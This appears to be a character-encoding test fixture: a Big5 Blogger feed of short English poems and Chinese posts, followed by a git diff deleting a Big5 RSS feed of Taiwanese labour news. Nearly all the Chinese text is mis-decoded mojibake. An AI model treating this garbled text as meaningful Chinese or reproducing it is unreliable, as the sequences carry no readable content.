-false - - - - -Letter Lego - -2005-06-16T09:43:00+08:00 -2005-06-19T15:04:14Z -2005-06-16T01:43:55Z - -tag:blogger.com,1999:blog-7743578.post-111888623520008196 -¥¼§¹¦¨&#12415;&#12363;&#12435;&#12379;&#12356;¡UI'm Well -<div style="text-align: left;"><span style="font-size:85%;"><a href="http://www.flickr.com/photos/leeicep/16602648/">The surrounded sky</a></span></div><p style=""><a href="http://www.flickr.com/photos/leeicep/16602648/" title="photo sharing" target="blank"><img src="http://photos14.flickr.com/16602648_e7989eca31_m.jpg" alt="" style="border: 2px solid rgb(0, 0, 0);" /></a></p><br /><span style="font-weight: bold; color: rgb(51, 204, 255);">I'm Well</span><br /><br />Looking up the blue sky<br />Here is the only place I can hide<br /><br />Nonsense feeling and empty thought<br />Filled my mind<br /><br />Is there any dream I dare<br />To catch and wait for me outside?<br /><br />Well, in my well where I'm well<br /><br />How great to sit and stay<br />Till night's falling, stars're shooting<br />...Time to die</p> -false - - - - -Letter Lego - -2005-05-10T01:41:00+08:00 -2005-05-18T22:17:07Z -2005-05-09T17:41:11Z - -tag:blogger.com,1999:blog-7743578.post-111566047101521210 -Where is my Dorothy? - -
    - - - -
    -Where is my Dorothy? -
    Posted by 31655069@N00.
    -
    §³ּ³ֵw×÷¨ג³¡×ר½gµ£¸
    - - - -The Wonderful Wizard of Oz - - - -
    - - - -Alice¡¦s Adventures in Wonderland - - - -
    ®ח¼ײµ·»P·RִRµ·
    ¨ג­׃¥ֽ¬¡­I´÷₪־­׃©³£÷IµM₪£¦P×÷₪k«ִ
    ¦³µ₪£ֲ_©¹´_×÷¹¹ׂ¯כ×÷©_¹J¾תְI
    ®ח¼ײµ·¹³·¥₪FRPG×÷»ג¶₪
    ¦׃·RִRµ·«h¬O¿W¦Quest
    -
    ₪k©ֱ`¬O«¯S®ם×÷¥D₪H¯־
    ¦b¦U÷״¥ֱ¶¡¬G¨ֶ»P¶ַ»¡µ£¸¸ּ¹ן₪k©×÷¸ױ·ׂ
    ֱ`¬O¥H©¾¸µ½¨}»¹²°ם¼¬ֶ¦½pְq³o¼ֻ×÷¬¼w§@¬°³ּ°×§P·ַ
    ¦׃³±¬X©ׂ¥¥¨|¥X×÷¥ְ©₪]¦¨¬°¦¨¥\×÷¦c¯ו
    -
    ©¼±o¼ן¸ּ×÷·ֵ®X¥²¶·§ך÷t₪p¶‎¶‎×÷¨₪¦ג
    ¥ױ³·₪½¥D©M¦ַ©h®Q«h¥²¶·¾«ש®a¨ֶ
    ®ז×L»P¦w®{¥ֽ₪‎÷¸¼w©ֳׂ¹¦C×÷₪½¥D
    ₪]¥²¶·¬°·Rִכ¬¹©^ִmµL¨pµL§
    -
    ¦׃®ח¼ײµ·ֱצµM¬O³o₪@₪ה©ַ²§¶₪¥מ×÷leader
    «oֱ¦³¸¯µY¹F¦b­I«ב§@¬°₪@­׃¥‏×¾¦ׁ₪H»P¯«¥P±׀¥ְ×÷¶H¼x
    ¶^¶^¼²¼²×÷·RִRµ·¬¹ן©ףֵצ¨g·²´µ©³¨½×÷¬ץ₪¬׃¦Z
    ₪]₪£¹L¬O­׃¦n©_¥פ©·Q­n°ׁ¥[₪U₪ָ¯ש·|×÷₪p₪k«ִ
    -
    ₪£¦A¥u¦³³ַ§J¥i¥Hצ₪W½¨§¾נ
    ©־×ּ₪½¥D¬ן±פ¦ֲַu₪§₪₪ֱפֲֳ¨­¥ק
    ₪@÷״₪ׁ¯uµLִ×÷¯S½ט¥u­n×uµ¶ְ¿j¹D
    ₪@÷״ִך÷©¦n©_×÷®נ®§´N¬O¸עµ¥ױ¨¨«
    -Lyman Frank Baum ©M Lewis Carroll -
    ³׀³y₪F₪@÷״ִ©ף₪k«ִ×÷¾תְI
    -
    -false -
    - - - -Letter Lego - -2005-05-06T14:58:00+08:00 -2005-05-06T07:09:41Z -2005-05-06T06:58:59Z - -tag:blogger.com,1999:blog-7743578.post-111536273984666232 -2004-11-04@13-57-02 - -
    - - - -
    -2004-11-04@13-57-02 -
    Posted by 31655069@N00.
    -
    ­¸₪ׁ¾ַ©f×÷ֳd׫
    «x¡H§¦n¹³ֱ₪£×¾¹D¨e×÷¦W¦r¡I :P
    -

    «¬X©M×÷¹ן₪ס¦ג©M₪£¿ש×÷´÷²`
    §³ֵw
    -

    ₪£¹L¹ן©ף³¾ֳ‏°~~
    ₪@×½«©ָ¥L­ּ×÷₪צ₪l
    ₪j¾ַ®ֱֹ®tֲI³Q¾ַ×רִF¥h¶ְ¥תֳs¨÷¨א¬ד¨s²r¸V©O
    ¦n¹³ֱ¦³¾ַ×ר­n§ה§¥h¦°®°l±צ×ב³ְ¡K
    ¦p×G¨÷®ֹ¯u×÷¥h¨«₪F³¥¥~
    ²{¦b₪£×¾¹D·|«ח»ע¼ֻ¡H
    -

    -
    -
    -false -
    - - - -Letter Lego - -2005-03-19T16:00:00+08:00 -2005-03-19T10:03:48Z -2005-03-19T08:00:30Z - -tag:blogger.com,1999:blog-7743578.post-111121923021275036 -::×ב½¬::₪₪₪s¸פ₪s×F¿N»ז©±:: - -
    - - - -
    -The breakfast place -
    Posted by 31655069@N00.
    -
    ¨÷₪@¦~®L×÷₪±¡¯S§O¯Bִ¼¡A¦]¬°§A§Y±N»·´ח­«¬v
    ֲַ₪f»¡­n¨ל×Fµ״¸°½׳₪ו«¾ֹ×÷¥i¯א
    ³­§A±q«ּ×FֵX¨®¦^×ב½¬
    ₪l©]±ׂµ{¡A¦b¹״ֲ׳¥H«n§A°±₪F₪U¨׃~~¬¡I₪י¥X~~
    §­ּ´N³o»ע¦wְR×÷±זµ¨÷₪@½¬ץ₪י¡Aµ¥µ¥¦ֵD₪W₪sְY
    ¶i₪F¥«°ֿ¥‎¦Y¦­ְ\¡A§A»¡³o¸ּ×÷ִ׀¨§¼¦n³
    §Y¨ֿ₪£·Q¨«¡Aֱ¬O³Q§A°e¶i₪F¨®¯¸
    ֱ¦b½L÷גµ¡G
    ¸׃¶¶¹D©yִץ¨£¨£¥ְ¿ֻ¡H×½¹F¥x¥_§ה×B₪ֽ¡H©־×ּ§₪¦^«ּ×F÷ג₪F¡H
    §A₪S­ֻ¨®¦^¨׃·n₪U¨®µ¡~~³o¬O¦L¥§־₪¨½®q¶R×÷¡A©p¯dµ~~
    ₪@¹ן÷כ½o×÷₪¥ײ¼v°¸¡A§´N³o»ע±·₪W₪F¨®
    «ב¨׃¨C¨ל¦­ְ\©±³£·|ֲIִ׀¨§¼¡A¦A₪]¨S¦³¨÷₪ׁ₪@¯כ×÷¬¨‎₪F
    -
    -false -
    - - - -Letter Lego - -2004-12-16T14:15:06+08:00 -2004-12-16T06:28:06Z -2004-12-16T06:28:06Z - -tag:blogger.com,1999:blog-7743578.post-110317848633456221 -::₪÷ֶW::20041007:: - -
    - -₪÷ֶW - -
    -
    ¥H¬°¦₪v§Y±Nֲק¶}¡A³o­׃¬מ₪ׁ¡A₪£¸Tֵ‎§·Q©¹¥~¶]¡C -
    ·s¦ֻ¡A₪÷ֶW¡C¼פ±x×÷¦a¦W¡A­¯¥ֽ×÷×ֵ¶¡¡C -
    ¨ה¹ך¡A₪]₪£¬O₪׃­¯¥ֽ¡F§¦b¦ׁµף₪W¬¨ל¡G -
    ₪₪ֳc·s¦ׁµP₪¦׳ִׁ¡A¨«°¨ֳ¡¥ֹ₪«¨~×G¦B¡A -
    ¥|°¦×ר¬¥i·R×÷¬y®צׯ¡A¦b×e¹D₪W¬D₪פ÷״µז×÷¶װְµ¦ׁ₪ׂ°¡A -
    ֱ¦³¼B¿³´÷©µe₪H׫¥H₪־«ָ®aµזְ]»P³ֲע­¡C
    -
    -false -
    - - - -Letter Lego - -2004-12-16T14:06:50+08:00 -2004-12-23T05:36:50Z -2004-12-16T06:07:51Z - -tag:blogger.com,1999:blog-7743578.post-110317727119414700 -::₪E¥ק::20041013:: - -
    - -₪E¥ק - -
    -
    ְנְY×÷÷ס¸­¦«µ¬ץ×בµLֱn°×½ץ¡Aֲא¹L₪p«ׁ¹J¨£₪@°¦¦P¼ֻ¦wְR×÷¿¡C -
    ¦b¨ט·Nֳhֲֲ×÷×^³ע₪U¡A«C¬K×÷אr­µ¶ֲֹm¦׃₪U¡C
    -
    -false -
    - - - -Letter Lego - -2004-09-24T09:08:12+08:00 -2004-09-24T02:15:12Z -2004-09-24T01:08:36Z - -tag:blogger.com,1999:blog-7743578.post-109598811683854658 -::×´³₪l::19961016:: - -
    - - - -
    ::ben::19961016:: -Posted by Hello - -
    -
    ³ּ·R§l§m₪ג«¡A³ּ·R©CִZ₪ע¦ח -
    -
    §¦¬¾i₪F©Tµ¦b₪fµִ´ֱ×÷´³¡A -
    ¸ץ±o«°×¡Aֱ·|¦₪v¶}×ש~~ -
    -
    -
    -false -
    - - - -Letter Lego - -2004-09-24T09:07:08+08:00 -2004-12-16T06:35:08Z -2004-09-24T01:07:54Z - -tag:blogger.com,1999:blog-7743578.post-109598807444245727 -::©¶ְ·ֵ·x×÷¨ּ°¹::19961208:: -<a href='http://photos1.blogger.com/img/242/1372/640/mi-ben-160.jpg'><img border='0' class='phostImg' src='http://photos1.blogger.com/img/242/1372/320/mi-ben-160.jpg'></a><br />::mimi & ben::19961208::&nbsp;<a href='http://www.hello.com/' target='ext'><img src='http://photos1.blogger.com/pbh.gif' alt='Posted by Hello' border='0' style='border:0px;padding:0px;background:transparent;' align='absmiddle'></a> <br />¨÷¬O·¥«׳±¡÷₪ֶ×÷₪@¦~¡A¦]¬°¥L¦V§¨D±B¥¼×G¡A¨M©w¦~©³»P¦oµ²±B¡C <br />«}©M´³₪~­ט²÷D»ױ¼׃×÷₪ל±ט¡A©ף¬O§­ּ₪@®a₪l÷¦b»ױ¼׃₪W¬₪¬¨ּ°¹¡C <br />§₪£ֲ_±q¾µ¹₪₪¿פ¨׃¡A¦]¬°³oֲש¨א₪k»P§₪£¦P³t×÷¥ֽ©R¦׃·t¦°ד×_¡K -false - - - - -Letter Lego - -2004-09-22T09:50:00+08:00 -2005-06-30T05:09:33Z -2004-09-24T00:19:18Z - -tag:blogger.com,1999:blog-7743578.post-109598515872310044 -::§×÷¿¨א₪k::20040922:: - -
    - - - -
    ::cats' club::20040922:: -Posted by Hello - -
    -
    «}©M´³¡A
    Coatty, Bright, Mocha and -X-
    -
    «}©M´³¡A¦b¶§©ת₪s×÷¬K´H®ֶ®k₪₪½ֿ¥ֽ¡F
    §¨S°ׁ»P¡C«o·¥₪O₪¶₪J¥L­ּ×÷³o₪@¥ֽ¡C
    -
    Coatty, Bright, Mocha and -X-, ©M¥L­ּ×÷©j©f May,
    ¥X²{¦b¥t₪@­׃¦³ֲIְך¼צ×÷¬K¥½¡C
    §´N­n¥Xµo¡A¨ל¨÷­׃ִ©ף®L×÷¦a₪ט¡A
    ֱ¬O§ג¥¦­ּ©ס¶i§×÷¨®ִ~ִע§×÷®ָµ{¡K
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/coolloud.org.tw.xml b/chardet/tests/Big5/coolloud.org.tw.xml deleted file mode 100644 index db12d90..0000000 --- a/chardet/tests/Big5/coolloud.org.tw.xml +++ /dev/null @@ -1,293 +0,0 @@ - - - - - -­W³ׂ÷פ -http://www.coolloud.org.tw/ -³o¬O­W³ׂ÷פ×÷ RSS -­W³ׂ÷פ -2005-12-31T04:10:06+08:00 - -₪ו«״·|µw₪£°_¨׃ -http://www.coolloud.org.tw/images/20051118/IMG_0119_200_small.jpg -http://www.coolloud.org.tw/news/database/interface/data_display2003.asp?ID=108135 - - - - - 1226ְֹ₪UֲI¥ז₪§«ב -₪£¨£´ֳ§ק₪£¨«₪H ¶i½¦±ֿ·|×ר´ֱ§¾װ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108725 - ¡@¡@ֱצµM₪ג₪₪×÷¨T×o¼u¡B¸j¦b¨­₪W×÷¥ֻ´µµ©¡A¦¨¥\×‎¾׳₪F12/26×k°|×÷ֲI¥זµ{§ַ¡C¦‎¦b¶R₪ט¡B»ָ¦ז¹־₪´₪£ִ@´£¨ׁ¨¬ֳB¸ְֹv×÷±¡×p₪U¡A¾D¸ך₪ט¹H×k¿n₪ם°h¥נ×ק¡B¸ך»÷¶O×÷×ס¦¦W¶i½¦±ֿ·|·|­¡A±N«שִע¾n¼t§×§¡C±q§×§×ל©l´N¨ף§U¦±ֿ·|§×§×÷®ח¶י¿₪³ׂ¸q°ָ»²¦ץ₪H¨ף·|¾G×קֲע×ם¥¡A³o¸s¾D¸ך₪ט¿ע±ף¡B¥¼ְע×k««O»×÷³ׂ₪u¡A₪w§×§×ס₪T¦~¡A¡u¨S¦³²z¥ׁ¦b³o­׃®ֹ­װ©ס±ף¡A¡v¥L±j½ױ¡A­Y¶R₪ט¦A₪£ְִ¥Xµ½·N¡A¦±ֿ·|₪£±ֶ°£´£°×§×§µ{«׳¡A¡u«ץ¼t°ֿ¬ג¥¡B­ֻ¼o... - ֳצ¼t - ­W³ׂ³ר¾ֹ - 2005-12-30T23:26:28+08:00 - ֳצ¼t - - - ¡iMy Cool News¡j -±¶¹B₪£­n¦A¥ױ¸י¡I¡u·´¬ש¦b¥‎¡A¦Y§¹©¼L¡A±b­n¼ײ¥ֽ½¡H¡v -¥C©µ«G»¡¡G¥xֶWµL¹D§@¬°¡Aֱp¦X°ך₪@©w±µ÷¼ײ¥ֽ¡C - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108721 - ¡@¡@₪µ¦~₪C₪כ₪G₪Q₪י¡Aֱp¦X°ך₪Hֵv²ױֲ´µo¥X÷ע«ז₪½³ר¥‏¥@¬ֹ¡I÷¼ײ¥ֽ°|¥ֱ¡u¥xֶW¡v÷~¥ֽ¯f₪ֽ¡A©Iֶ~¡u¥xֶW¡v¬F©²₪£¯א­¢¾E¯f₪ֽ¡C³o¬O±q¥ֱ°ך₪»₪Q´X¦~₪§«ב¡A¡u¥xֶW¡v­÷¦¸³Qֱp¦X°ך¬¨ל»Pֳצ×`×÷ִ³ֳD¡C₪µ¦~₪Q₪כ₪G₪Q₪­₪י¡u¥xֶW÷~¥ֽ¯f₪ֽ¸ף®¦V₪י¨Dְv³׃¶D¡v¡A¯f₪ֽ²׳©ף³¯­¥l³·₪@±½₪C₪Q₪­¸×ְ·|¦ֳ¦W×[µר¡A²׳©ף¥i¥H°ר±ז½ֽ½ֽ₪°»ע¬O¡u÷~¥ֽ₪Hֵv¡v¡C¼ײ¥ֽ«O¯d¦±ֿ·|×ס´ֱ¦b¥×k°|±ְ°¡u÷~¥ֽ¯f₪ֽ₪Hֵv«O»±ר¨ׂ¥×k₪u§@¡v¡A©¯¹Bְע±o°ך¿ֻ¥xµLµ¥¦Uִׂ¹־¥©e¥‏₪O₪ה... - 200410¼ײ¥ְֽר¾i°|¾D©מ°£ - ­W³ׂ½׳¾ֲ - 2005-12-30T18:40:48+08:00 - 200410¼ײ¥ְֽר¾i°|¾D©מ°£ - - - ¯ף²v¨Mµ¦¡@´c·d₪½¦@₪ֶ -µ״µר₪u·|§ִ³·s»D§½«n¾E¬Fµ¦ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108702 - ¡@¡@¥×k°|₪µ¡]12/30¡^¼fִ³¡uµL½u¹qµר₪½×ְִׁ¥X±ר¨ׂ¡v¡A¥ׁ©ף₪י«e·s»D§½×ר«ְ₪ו´¼¬נµM¥ב¥X¡uµ״µר«n¾E¡v×÷ִ³ֳD¡A¨ֳ¥B×§¨ת¦b₪µ₪ׁ¼f¬d±ר¨ׂ®ֹ±N¸׃±ר₪ו¯ַ₪J¡A³o­׃ֱ|°¡A₪°_µ״µר₪u·|¸s±¡¿E¼«¡A₪@¦ז¦¾l₪H«e©¹¥×k°|×ם¹F§ִ³¡C - -¡@¡@µ״µר₪u·|±`°ָ²z¨ֶ¦¶«T»{¬°¡A¦b¬ֳצ×÷¸ך·½¡B°t®M³£¨S¦³¨ל¦ל×÷±¡§־₪U¡A¦]¬°·s»D§½×רֱ{®ֹ°_·N×÷₪@­׃¨M©w¡A´N­n§ג¹qµר¥x¾E¨ל°×¶¯¥h¡Aֲ²×½¹³¡u§ג©ף©ס¦b¨F÷z¸ּ¡v₪@¼ֻ¡A¦b³o÷״±¡§־₪U¡Aµ״µר₪@¥¹«n¾E¡A¥²©w... - ´Cֵי - ­W³ׂ³ר¾ֹ - 2005-12-30T15:44:01+08:00 - ´Cֵי - 200509µL½u¹qµר¨ֶ·~₪½×ׁ³B²z₪ט®׳ - - - 14¦W₪ֿ¥@¶T³Q¶D₪H₪h¡@­»´ה30₪י¶}®x -HKPA¦A«׳µo°§ִ³¡@¨ֳ©Iֶ~®¥~¿דֵD¹q¶׳ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108686 - ¡@¡@­»´הWTO³¡×ר¯ֵ·|ִ³³ץ¥~§ִ³³Q°_¶D×÷14¦W₪H₪h¡A©ת₪ׁ­»´הֶ[¶ם×k®x±N¶i¦ז²ִ₪T¦¸×÷¼f²z¡C«nֱת11¦W³Q°_¶D₪H₪h×÷®aִ₪־©ִׂ¹־ֵי¦¨­¡A₪@¦ז35₪H₪]©ף¬Q₪ׁ±q«nֱת­¸©ט­»´ה¡A°ׁ»P­»´ה¥ֱ¶¡÷¹מ¥@¶Tֱp·ש¡]Hong - Kong People's Alliance on WTO¡FHKPA¡^©ף₪µ¡B©ת¨ג₪ֱׁ|¿ל×÷₪T³ץ¬¡°¡A­n¨D©ת₪ׁµL¸oְִ©ס³Q°_¶D₪H₪h¡C -¡@¡@₪W¶g¸g¹L­»´ה×ְ¹B¹־ֵי×÷§V₪O₪־°ך»ֱn´©¡Aֶ[¶ם×k°|©ף12₪כ23... - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - ­W³ׂ³ר¾ֹ - 2005-12-29T22:40:41+08:00 - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - - - ¡iMy Cool News¡j -¶T©צ¦¨ֵ}¡]Addicted to Trade¡^ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108682 - ¡@¡@¬Q₪י°ׁ¥[₪@³ץ¡u÷ֻ·ַWTO¡A¼fµר¥xֶW¸gְ¡v®y½ֽ·|¡A¥ׁ¥©e¿א©¯´D¥D«ש¡A¥]¬A¥xֶW¹A¥ֱֱp·ש¡B­W³ׂ÷פ¡B¥xֶW¸gְ¬ד¨s°|©M¥‏°ךֱ`₪u·|¡A³£¦³¥N×ם°ׁ¥[¡C°£ְֻµר­»´ה·|ִ³₪÷®e¡B₪ֿWTO¥¿·ם©¡B¥tֳ‏¥‏²y₪ֶµ¥ִ³ֳD¥~¡A₪]±´°Q²ױ¦¨¡u¥ֱ¶¡÷·‏WTOֱp·ש¡v¥i¯א©¡C - -¡@¡@¥@·s½²«״₪¯¡B¥x¸g°|§d÷ײ¦¨©M₪₪¬ד°|×פ©µ«G¡A©¼¦¹¨¥µ¥ז¾W¡A₪¬¬₪סֱn­µ₪j¡A₪ֿ¦׃₪@¦ל¥~ִy¡uְפ«O¡v«®v₪ו¾|±l¡]Robin Winkler¡^¦³½ל×÷¸g¾ת¡A§l₪¥״¥ת¡A²{... - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - ­W³ׂ½׳¾ֲ - 2005-12-29T21:36:36+08:00 - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - - - ²o₪ג¡I₪ֿ₪פ§Q¸p¿ש»~¶}µo¡@÷R´ְפ¹ׂ¥ֽ÷A -₪ֿ´¿₪ו¶V°ל₪₪פ»P₪ֿ´ע₪s₪פ®wµ²·ש¡@¬Iְ£¥°|ִׂ¹־§R°£¹w÷ג - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108681 - ¡@¡@´¿₪ו₪ו®w¶V°ל₪₪פ»P´ע₪s₪פ®w¨ג­«₪j¶}µo®׳¡A´X¦~¨׃×§ִ³₪£ֲ_¡A₪µo¿E¯P§×§¡A₪פ§Q¸p¦¥Gֱ¬O·QֶZ·F¡Aµw¬O½s¦C₪F¦~«׳¹w÷ג°e¶i¥×k°|¼fִ³¡C¬°®ֲ½ֳ¥ֽ¦sֵv¡B÷ֵ@ְפ¹ׂ¥ֽ÷A¥ֳִע¡A°×¶¯¥«±׀®v·|¥ֽ÷A±׀¨|₪₪₪»P¬¿@·R¶m¨ף¶i·|©~₪₪©b¨«¡A¦ך³s₪F׃y¹A·ֻ¬y°ל®ח·½¶m¡B₪T¥ֱ¶m­ל¦ם¥ֱ»P¥‏¥x₪ֿ´ע₪s₪פ®w¹־ֵי¡Aֱp¦X²ױ¦¨¥xֶWֵ@₪פֱp·ש¡A­n¨D¥×k°|§R°£₪פ§Q¸p×÷¶}µo¹w÷ג¡C - -¡@¡@ֱp·ש¹־ֵי¥N×ם₪@¦ז₪T¡B¥|₪Q₪H₪W₪ָ¥‎¦b¥×k°|×ש₪f¥l¶}°O×ּ·|¡A¦b₪@¹D¹D... - ₪פ¸ך·½ - ­W³ׂ³ר¾ֹ - 2005-12-29T21:32:44+08:00 - ₪פ¸ך·½ - ₪ֿ₪פ®w - - - ₪₪°ך¥[₪J¥@¬ֹ¶T©צ²ױֲ´×÷×ְ·|¦¨¥» - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108677 - ¡@¡@₪₪°ך¥[₪J¥@¬ֹ¶T©צ²ױֲ´₪w¸g₪T¦~₪F¡C³o₪T¦~₪־₪§«e爲¦¹¦׃§@·ַ³ֶ×÷₪Q¦h¦~¡A²`¨ט¦a§ןֵ₪F₪₪°ך¡C - -¡@¡@¦h¦~¨׃¡A₪₪°ך¬F©²©M₪₪°ך×÷¥D¬y×÷¸gְ¾ַ®a­ּ¡A₪@×½±N₪₪°ך¥[₪J¥@¶T²ױֲ´¬§@₪@­׃»P¬F×v¡A×ְ·|°ֳDµL×½±µֳצ«Y×÷¹ן¥~¶T©צ×÷¬Fµ¦°ֳD¡A¬O₪@­׃¸gְ¹ן¥~¶}©ס×÷§³N©°ֳD¡C¥L­ּ·ם®ֹ´X¥G¬O§¹¥‏¨S¦³¹w­p¨ל¡A₪₪°ך¡A₪׳¨ה¬O´¶³q×÷₪₪°ך¦ׁ¦©m¡A·|爲¦¹¥I¥X¦p¦¹₪§°××÷¥N»ש¡C - -¡@¡@­÷¥‎¡A¥[₪J¥@¶T₪־... - ₪₪°ך³ׂ₪u - ­W³ׂ½׳¾ֲ - 2005-12-29T19:54:30+08:00 - ₪₪°ך³ׂ₪u - - - ±q¼w°ך¥×ֱlֱִׂp·ש×÷³׃¥X½ֽ°_ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108672 - ¡i¼w°ך₪j¿ןµ²×G»¡©ת₪F₪°»ע¡H¡j -¡@¡@°ך»ֳצ×`×÷¼w°ך°ך·|₪j¿ן©ף¨ג­׃¦h₪כ«e´¦¾ו₪F¡A¦b³s¦ך×÷½ֽ§P»P¥ז©צ«ב¡A·s×÷¡u°ע¥ֱ·ש¡‏°ע×ְ·ש¡׀×ְ¥ֱִׂ¡v₪jֱp¦X¬F©²₪]²׳©ף§־¦¨¡A¦‎₪j¿ןµ²×G¹ן¼w°ך¬F§½×÷¾°₪~­ט¶}©l¡C³o¦¸¿ןֱ|©תֵד₪ֿ¬M¼w°ך¥ֱ²³¬F×v·Nֳׁ×÷¦V¥×ֲא¡A×ם¹F₪F³ׂ°¸s²³¹ן«d´מ×ְ·|÷ײ§Q¡B¥¢·~©M³h½a₪ֶ×÷©µ´¡C¼w°ך·¥´I¼vֵT₪O×÷´Cֵי¡m©תֳט©P¥Z¡n¦b¿ן«ב¥H¡u¼w°ך«O¦u¥D¸q×÷¦÷₪`¡v¬°ֳDµ½׳¦¹¦¸₪j¿ן¡A÷¡u¬O®ֹ­װ´ְ¼w°ך«O¦u¥D¸q¼g­r»D₪F¡vµש2... - °ך»¬F×v - ­W³ׂ½׳¾ֲ - 2005-12-29T12:40:48+08:00 - °ך»¬F×v - - - ¡iKONG YEE SAI MAU!!!¡j­»´ה»·©÷鬪×§¹־ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108671 - ¡@¡@³o§¹¥‏¬O₪@½g¥¢±±×÷₪ו³¹¡A¥»¨׃¬O§ֶ±ז¦h«ץ±¸₪@¨ַ­»´ה₪ֿWTO×÷¬¡°¥H₪־°ׁ»P²ױֲ´¡A¦‎¬OµJֲI±q·j´M³ץ¥~®y½ֽ¶}©l¡A¨ל«ץ±¸­‏¨ַ¹־ֵי¨­¦b¨ה₪₪¡AְH§Y₪@µo₪£¥i¦¬¬B¡C´N³sֱת°ך鬪×§¹־³£¼³₪ׁ»\¦a¥|³B³sµ²­׃¨S§¹¡]³o·ם₪₪₪£­n´£«¦h®¥»¬O§»y¨¥₪£³q¡Bֵ×₪£ְ´×÷¸ך®ֶ¡^¡Cֱ`₪§¡A¥H₪U¬O¨÷¨ַ¥¢±±₪Sµ״ִR·j´M°O¿‎¡C - -¡@¡@­»´ה¥@¶T·|ִ³ֱ|¦ז´ֱ¶¡¡A³ץ¥~×÷§ִ³¥«ֲ²ױֲ´¦P®ֱֹ|¿ל¦h³ץ½׳¾ֲ¡B®y½ֽ·|¡]ִ³µ{¡^¡Aֵ‎¥@¬ֹ¦U¦a×÷₪ֿWTO²ױֲ´... - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - ­W³ׂ½׳¾ֲ - 2005-12-29T01:17:07+08:00 - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - - - ִׂ¬F­x°h¥X´Cֵי¡@´ֲ³¥¦A¥[×o - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108668 - ¡@¡@12₪כ26₪י¬Oִׂ¬F­x°h¥X´Cֵי×÷³ּ«ב´ֱ­­¡A¨ּ¾¥×k°|2003¦~³q¹L×÷¼s¹q×k­׳¥¿®׳¡A¬F©²₪־¬Fִׂ×ׁ¥ק¥²¶·¦b¨ג¦~₪÷°h¥X¼s¹q´Cֵי¡AµM¦׃¡A§סֳצ¥x¡Nµ״µר×ֵׁvֲא²¾×÷¡uµL½u¹qµר₪½×ְִׁ¥X±ר¨ׂ¡v₪י«e¦b¥×k°|¨ף°׃¯}§½¡A₪@×½¨ל₪j­­×÷³ּ«ב₪@₪ׁ₪´¥¼¯א¹Lֳצ¡A¦]¦¹¡A¥ֱ¶iִׂ¬F©²ִׂ¬F­x°h¥X´Cֵי×÷©׃¿ױ₪w¸g¸ץ²¼¡C - -¡i©ׂ¦³ֵv₪´¦b¬F©²₪ג₪₪¡j - -¡@¡@ֱצµM¡A25₪י³ִ±¥xµר¸³¨ֶ×ר¿א°ך¬w¡Nֱ`¸g²z¾Gְu¡Aµ״µר¸³¨ֶ×ר©P»T¥ֽ¡Nֱ`¸g²z¦¿ֱרµ¥₪½×ׁ¸³... - ´Cֵי - ­W³ׂ½׳¾ֲ - 2005-12-28T22:55:43+08:00 - ´Cֵי - - - ₪j®a₪@°_°Q½׳¼ײ¥ֽ²{×p₪־»s§@¼ׂ«¬ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108720 - °Q½׳®ֹ¶¡¡G©P₪»12/31¡Apm6:00~9 :00 -»s§@®ֹ¶¡¡G12/31,1/1,1/2 ₪T₪ׁ -¦aֲI:¼ײ¥ֽ½´µ× -ֱ½׀¹ן¶H¡G¸q₪u¡Aֳצ₪¼ײ¥ֽ×÷×B₪ֽ¡A -±׀¾ַ»P»s§@¡G¿א¿A§g¡B×L×Y©ֹ -³ר¦Wֱpµ¸¡G¿א¿A§g¡A0968418663¡Asawalai@gmail.com¡Ar92544020@ntu.edu.tw -¦³·N°ׁ»P×ּ¥iְH·Nֳ§U¨C₪H200₪¸¼ׂ«¬»s§@¶O¡C - -»¡©ת:¼ײ¥ֽ«O¯d¦±ֿ·|×ס´ֱ¦b¥×k°|±ְ°¡u÷~¥ֽ¯f₪ֽ₪Hֵv«O»±ר¨ׂ¥×k... - 200410¼ײ¥ְֽר¾i°|¾D©מ°£ - ¼ײ¥ֽ«O¯d¦±ֿ·| - 2005-12-30T18:26:16+08:00 - 200410¼ײ¥ְֽר¾i°|¾D©מ°£ - - - ₪ה«ש¦w¦ׁ₪E₪E₪ט®׳ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108713 - ₪E ₪Q ¥| ¦~ ₪Q₪G ₪כ ₪T₪Q₪י - -¡]94¡^°×¥«ֱ`·s¦r²ִ ₪@₪T₪T¸¹ - -¥‏°ך±׀®v²z¨ֶ·|©ׂ´£¡u¦w¦ׁ₪E₪E₪ט®׳¡v¡A±N18%§ן¬°9%¡F°ך¥ֱִִׂׂ¥D®u°¨­^₪E«¥¬Fµ¦·|¶i¦ז¬ד¨s¡A¦A¥ז¥ׁ¥°|ִׂ¹־´£¥Xִׂש­׳×k¡C¡u₪E₪E₪ט®׳¡v×÷°ע¥»÷c«ה¬°¡A°h¥נ³ׂ₪u½׀»ג¦ׁ¦~µ¹¥I®ֹ¶ָ»ג¥b¼ֶ¡A¥t¥~¥b¼ֶ¥ז³ׂ«O§½¨ּ³W©w¹B¥־¥ֽ®§¡A¥H½׀»ג×÷×קֳB¦ׁ¦~µ¹¥I1/2­p®§9%µ¹₪©³ׂ₪u¦b°h¥נ«ב×÷¥ֽ¬¡«O»¡C¹ן©ף¥‏°ך±׀®v·|©ׂ´£¡u¦w¦ׁ₪E₪E₪ט®׳¡v¡A°×¶¯¥«ֱ`₪u·|µ¹₪©°×«׳×ײ©w¨ֳ×ם¥₪ה«ש... - ×ְ·|÷ײ§Q - -°×¶¯¥«ֱ`₪u·| - 2005-12-30T16:23:49+08:00 - ×ְ·|÷ײ§Q - - - 